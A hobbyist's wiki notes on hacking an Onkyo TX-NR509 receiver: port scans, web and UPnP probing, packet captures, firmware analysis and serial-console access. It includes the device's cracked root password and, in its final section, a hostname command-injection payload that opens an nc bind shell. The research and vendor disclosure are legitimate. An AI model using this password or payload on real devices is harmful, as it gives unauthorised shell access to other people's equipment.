 hacker:: [[turmio]]

<<TableOfContents>>
= Onkyo TX-NR509 =

This is page for my notes for hacking Onkyo Tx-NR509. Everything is dumped mainly to my own use. Watch http://www.happyhacking.org/ for more formal text. 

 * My goal is to:
  * Get access to shell (done)
  * Find hidden features (some)
  * Learn how it works :) (pretty much) 

 * If you find something interesting please contact me with e-mail: mikko.kenttala(ä)gmail.com or via IRC Turmio@IRCnet

== Links ==
 * Model: http://www.eu.onkyo.com/en/products/tx-nr509-35637.html
 * Softwares inside: http://www.eu.onkyo.com/downloads/1/2/0/2/0/21966034_49cbbea4e5.pdf
 * Current firmware: http://www.eu.onkyo.com/en/articles/firmware-update-tx-nr509-15-12-2011-53085.html
 * Customer service: http://www.eu.onkyo.com/en/products/tx-nr509-35637.html?tab=Support
 * Service Manual [[attachment:onkyo_tx-nr509_[ET].pdf]]
 * Might be useful [[attachment:onkyo_repair-tips_[ET].pdf]]
 * There might be something useful [[attachment:onkyo_tx-nr1000-service_tips-av-receiver_[ET].pdf]]
 * Decrypting firmware: http://divideoverflow.com/2014/04/decrypting-onkyo-firmware-files/
== Services ==
{{{
$ nmap -A -sT -p 1-65535 10.0.2.137

Starting Nmap 5.21 ( http://nmap.org ) at 2011-09-06 18:08 EEST
Strange error from connect (65):No route to host
Nmap scan report for 10.0.2.137
Host is up (0.015s latency).
Not shown: 59802 filtered ports, 5731 closed ports
PORT     STATE SERVICE         VERSION
80/tcp   open  http?
8888/tcp open  sun-answerbook?
60128/tcp open  unknown
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
}}}

== Web-server ==
=== Basic information ===
 * No authentication
 * http:///10.0.2.137/info.cgi [[attachment:info.png]]
 * http:///10.0.2.137/station.cgi [[attachment:station.png]]
 * http:///10.0.2.137/network.cgi [[attachment:network.png]]
 * http://10.0.2.137/customer_setting/customer_setting.cgi [[attachment:customer.png]]

=== Skipfish findings ===  
 * Skipfish found "secret" page. http://10.0.2.137/config.cgi [[attachment:configpage.png]]
 
 * Surffing to http://10.0.2.137/station.cgi?page=2147483647 cause this: [[attachment:strange.png]] (Page number should be 0 or 1 to work. 
  * http://10.0.2.137/station.cgi?page=294967999 <-- resulted empty answer
{{{
$ curl -v "http://10.0.2.137/station.cgi?page=294967999"
* About to connect() to 10.0.2.137 port 80 (#0)
*   Trying 10.0.2.137... connected
* Connected to 10.0.2.137 (10.0.2.137) port 80 (#0)
> GET /station.cgi?page=294967999 HTTP/1.1
> User-Agent: curl/7.21.2 (x86_64-unknown-openbsd4.9) libcurl/7.21.2 OpenSSL/1.0.0a zlib/1.2.3 libidn/1.19
> Host: 10.0.2.137
> Accept: */*
> 
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-type: text/html
< 
* Closing connection #0
}}}

   * Buggy web-page in html [[/stationHTML]]
== Serialport socket ==
 * Sone kind of hack to forward old serial port to socket.
  * Wrote smiple test code at one night: [[attachment:tOnkyo.py]] (You don't want to use it ;) )
  * You can find the codes to reviver serial ports from the internet: [[attachment:onkyo.xls]]

== Serial port and J-TAG ==
 * It seems that there is Serial port and J-TAG inside.
 {{attachment:jtag-rs232.png}}


=== NET/ USB section (This seems to be valid) ===

 {{attachment:uart-rs232-net.png}}



 * Ugly hack to get shell:  [[attachment:IMG_2403.JPG]]  and  [[attachment:IMG_2405.JPG]]

 * You need to have account to get to shell
  * login:  ''root''   password: ''morimori''   (john the ripper did the trick)
 
 * [[/BootEnvironment]]
 * [[/Boot-message]]
 * [[/psOutput]]
 * [[/CommandsAvailable]]
 * [[/InfosInside]]

== USB-interface ==
 * You can play mp3's etc. from USB

== UPnP support ==

{{{
$sudo tcpdump  -i en1 -s 65535 -A host 10.0.2.137
18:34:30.134432 IP 10.0.2.137.ssdp > 239.255.255.250.ssdp: UDP, length 345
E..u..@...z.
........l.l.a.dNOTIFY * HTTP/1.1
HOST: 239.255.255.250:1900
CACHE-CONTROL: max-age=1801
LOCATION: http://10.0.2.137:8888/upnp_descriptor_0
NT: urn:schemas-upnp-org:service:AVTransport:1
NTS: ssdp:alive
SERVER: Linux/2.6.33-rc4 UPnP/1.0 MediabolicUPnP/1.8.225
USN: uuid:65b0dc02-c3dc-02b9-14d5-0209c3b9ca73::urn:schemas-upnp-org:service:AVTransport:1

}}}
Server header:

{{{
< HTTP/1.1 200 OK
< Content-type: text/xml; charset=utf-8
< Content-length: 3297
< Server: MediabolicMWEB/1.8.225
< Connection: keep-alive
< 
* Connection #0 to host 10.0.2.137 left intact
* Closing connection #0
}}}
{{{
$ lynx --dump "http://10.0.2.137:8888/upnp_descriptor_0"

   10urn:schemas-upnp-org:device:MediaRenderer:1TX-NR509 test
   AAAONKYOhttp://www.onkyo.comAV
   ReceiverTX-NR509TX-NR509http://www.onkyo.comuuid:65b0dc02-c3dc-02b9-14d
   5-0209c3b9ca73urn:schemas-upnp-org:service:RenderingControl:1urn:upnp-o
   rg:serviceId:RenderingControl/upnp_control_0/upnp_event_0/scpd/Renderin
   gControl_1urn:schemas-upnp-org:service:ConnectionManager:1urn:upnp-org:
   serviceId:ConnectionManager/upnp_control_1/upnp_event_1/scpd/Connection
   Manager_1urn:schemas-upnp-org:service:AVTransport:1urn:upnp-org:service
   Id:AVTransport/upnp_control_2/upnp_event_2/scpd/AVTransport_1http://10.
   0.2.137/VEN_1666&DEV_1100&REV_01
   VEN_0033&DEV_000C&REV_01DMR-1.50Multimedia.DMRMS_DigitalMediaDeviceClas
   s_DMR_V001image/jpeg12012024http://10.0.2.137/icon/onkyo_low_120.jpgima
   ge/jpeg484824http://10.0.2.137/icon/onkyo_low_048.jpgimage/jpeg323224ht
   tp://10.0.2.137/icon/onkyo_low_032.jpgimage/png12012024http://10.0.2.13
   7/icon/onkyo_low_120.pngimage/png484824http://10.0.2.137/icon/onkyo_low
   _048.pngimage/png323224http://10.0.2.137/icon/onkyo_low_032.pngMediaDev
   ices01

}}}

=== AMP fetches data from the server ===

{{{
GET /upnphost/udhisapi.dll?content=uuid:8178c854-4d03-42c8-8195-24fba0cb8abf HTTP/1.1
Host: 10.0.2.18:2869
User-Agent: Mediabolic-IMHTTP/1.8.225 UPNP/1.0 DLNADOC/1.50


14:25:09.292366 IP 10.0.2.137.43029 > 10.0.2.18.2869: Flags [P.], seq 1:173, ack 1, win 2920, options [nop,nop,TS val 328932421 ecr 11972172], length 172
E.....@.@...
...
......5jV..."B....h.g.....
...E...LGET /upnphost/udhisapi.dll?content=uuid:8178c854-4d03-42c8-8195-24fba0cb8abf HTTP/1.1
Host: 10.0.2.18:2869
User-Agent: Mediabolic-IMHTTP/1.8.225 UPNP/1.0 DLNADOC/1.50


14:25:12.721323 IP 10.0.2.137.43030 > 10.0.2.18.2869: Flags [P.], seq 1:173, ack 1, win 2920, options [nop,nop,TS val 328932764 ecr 11972515], length 172
@.@..p
...
......5n.T}.......h.......
........GET /upnphost/udhisapi.dll?content=uuid:8178c854-4d03-42c8-8195-24fba0cb8abf HTTP/1.1
Host: 10.0.2.18:2869
User-Agent: Mediabolic-IMHTTP/1.8.225 UPNP/1.0 DLNADOC/1.50

}}}

== Firmware update over network ==
 [[/UpdateFromConsole]]
{{{
10.0.2.137:50127 -> 10.0.0.1:53
  .............avrupd.onkyo.com.....                                         
#
U 10.0.0.1:53 -> 10.0.2.137:50127
  .............avrupd.onkyo.com.....¿.......Q....updsrv¿.¿.......Q...“..L¿...
  ....5Ï...ns1.onkyo.co.jp.¿.......5Ï...ns1.omp.ne¿`¿S......5Ï..“«™N¿p......5
  Ï..“.."                                                                    
####
T 10.0.2.137:51273 -> 210.134.145.76:80 [AP]
  POST /release/cgi/download.cgi HTTP/1.1..Host: avrupd.onkyo.com..Accept: */
  *..User-Agent: AVR/1.0..Content-Type: application/x-www-form-urlencoded..Co
  ntent-Length: 69....hwaddr=00:09:b0:c1:d5:c3&filename=AVR0007/ONKAVR0007_00
  NA00EA00NA.of1                                                             
#
T 210.134.145.76:80 -> 10.0.2.137:51273 [AP]
  HTTP/1.1 200 OK..Server: Apache..Status: 200 OK..Date: Sun, 04 Sep 2011 20:
  09:21 GMT..Content-length: 256..Content-Type: application/octet-stream.....
  BÀW/¡∂.zË;∏∆¸ Ã≠i.I.?2..Æ~,≤¸aœsË.|O..v.J.sN©.P.U∆¬B>….ÔF.ÚË<Dp¨†8.€Á•¥w3.
  BˇW...™LU˝g⁄˙._9 ˛.[ÿ‚@ÿ.B…µ.˙.›◊'J≈.d1p%l..p.ÌØo◊Z...nˇ1ﬁ..?·BR(§Xˆ.R ..J
  ⁄ÿ„Cﬂ)a.3.Ù≥”∂≥.G.mD.u.L..mÈ.U‹5√ÒÚ+y$ƒ‚/n˜ˆ..qM™.]ÌX...cÍ..uU∫º.nY...u.O.≠
  .).W·@⁄ PÁÛ.±ΩÊ›.(..c1r+z'ÀÒN¨                                             
#####

}}}

== Reverse engineering firmware ==
 
 * You can download image manually from Onkyos web-sites (check links)
 * It is compressed with zip. zip contains 3 different file: 
{{{
$ ls -la
total 22856
drwx------@  5 turmio  staff       170 Sep  6 18:43 .
drwx------+ 26 turmio  staff       884 Sep  6 18:42 ..
-rw-rw-rw-@  1 turmio  staff       256 Aug  4 20:22 ONKAVR0007_00NA00EA00NA.of1
-rw-rw-rw-@  1 turmio  staff    482048 Aug  4 20:22 ONKAVR0007_00NA00EA00NA.of2
-rw-rw-rw-@  1 turmio  staff  11211520 Aug  4 20:24 ONKAVR0007_00NA00EA00NA.of3

}}}

For some reason all 3 files starts with this:
{{{
ONKAVR0007_00NA00EA00NA_107$ hexdump -C ONKAVR0007_00NA00EA00NA.of1
00000000  95 42 cb 57 2f c1 b6 0f  7a e8 3b b8 c6 fc ca cc  |.B.W/...z.;.....|
00000010  ad 69 14 49 9a 3f 32 2e  05 ae 7e 2c b2 fc 61 cf  |.i.I.?2...~,..a.|
00000020  73 e8 01 7c 4f 06 19 76  0d 4a 0e 73 4e a9 97 50  |s..|O..v.J.sN..P|
00000030  9f 55 c6 c2 42 3e c9 13  f0 ef 46 0f f2 e8 3c 44  |.U..B>....F...<D|
00000040  70 ac a0 38 02 db e7 a5  b4 77 33 88 42 ff 57 17  |p..8.....w3.B.W.|
00000050  0d 8d aa 4c 55 fd 67 da  fa 17 5f 39 ca fe 0b 5b  |...LU.g..._9...[|
00000060  d8 e2 40 d8 1a 42 c9 b5  9e fa 80 dd d7 27 4a c5  |..@..B.......'J.|
00000070  06 64 31 70 25 6c 09 8d  70 0a ed af 6f d7 5a 0c  |.d1p%l..p...o.Z.|
00000080  82 14 6e ff 31 de 16 96  3f f0 e1 42 52 28 a4 58  |..n.1...?..BR(.X|
00000090  f6 10 52 20 99 9d 4a da  d8 e3 43 df 29 61 08 33  |..R ..J...C.)a.3|
000000a0  88 f4 b3 d3 b6 b3 8a 47  0a 6d 44 97 75 0d 4c 14  |.......G.mD.u.L.|
000000b0  81 6d e9 19 55 dc 35 c3  f1 f2 2b 79 24 c4 e2 2f  |.m..U.5...+y$../|
000000c0  6e f7 f6 07 8b 71 4d aa  9c 5d ed 58 0a 7f 0e 63  |n....qM..].X...c|
000000d0  ea 08 8d 75 55 ba bc 9d  6e 59 0c 83 17 75 0e 4f  |...uU...nY...u.O|
000000e0  0f ad 82 29 99 57 e1 40  da 20 50 e7 f3 1a b1 bd  |...).W.@. P.....|
000000f0  e6 dd 02 28 83 84 63 31  72 2b 7a 27 cb f1 4e ac  |...(..c1r+z'..N.|
00000100

}}}

 * Cannot find any information from Internet with those headers
 * No human readable data in any of the images

 * Firmware is likely encrypted. Found this from serial console messages while updating:
  {{{
[GetFWBody (CFWPackFile.cpp 464)]  CalcCheckSum match.
[GetFWBody (CFWPackFile.cpp 468)]  Decrypt start.
[GetFWBody (CFWPackFile.cpp 478)]  Decrypt end.
}}}
 * Symbols from {{{nm --demangle -D /opt/onkyo/avr/lib/mod/libupdater.so}}} are available in [[attachment:libupdater.so.symbols]]

 * Disassembling: {{{objdump --demangle -d /opt/onkyo/avr/lib/mod/libupdater.so}}}

 * http://divideoverflow.com/2014/04/decrypting-onkyo-firmware-files/

== Backdooring the amp ==

You can set up backdoor to your  AMP with setting hostname from WEB-management to:  ''`nc -l -l -p 9999 -e /bin/ash &`'' and rebooting the amp using the power switch. 

After reboot you can take telnet / nc -connection to port 9999 and you should have shell access.

This bug is reported to Onkyo a long time ago so it might be fixed in newer versions.
== Attachments ==
<<AttachList>>
 description:: Getting shell from Onkyos AVR with network capabilities
 started:: 2011-09-06
----
CategoryProjekti
